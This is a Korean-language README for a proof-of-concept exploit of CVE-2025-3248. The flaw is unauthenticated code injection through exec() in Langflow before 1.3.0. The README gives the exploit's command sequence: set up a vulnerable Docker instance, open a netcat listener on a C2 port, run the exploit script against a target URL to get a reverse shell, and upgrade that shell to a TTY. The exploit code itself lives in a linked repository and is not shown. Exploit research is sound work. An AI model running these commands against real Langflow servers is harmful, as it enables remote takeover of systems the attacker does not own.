
Langflow 버전 1.3.0 미만에서 RCE를 달성하기 위한 PoC
Langflow 버전 1.3.0 이전 버전은 /api/v1/validate/code 엔드포인트에서 Python exec() 함수를 통해 인증되지 않은 코드 주입에 취약합니다. 이 익스플로잇은 이 취약점을 악용하여 리버스 셸 연결을 설정합니다.
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4
# Terminal 1
nc -nvlp <C2_PORT>
# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>
예: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337
참고: 셸을 TTY로 업그레이드하려면 셸을 획득한 후 아래 명령을 실행하세요.
python -c 'import pty; pty.spawn("/bin/bash")'
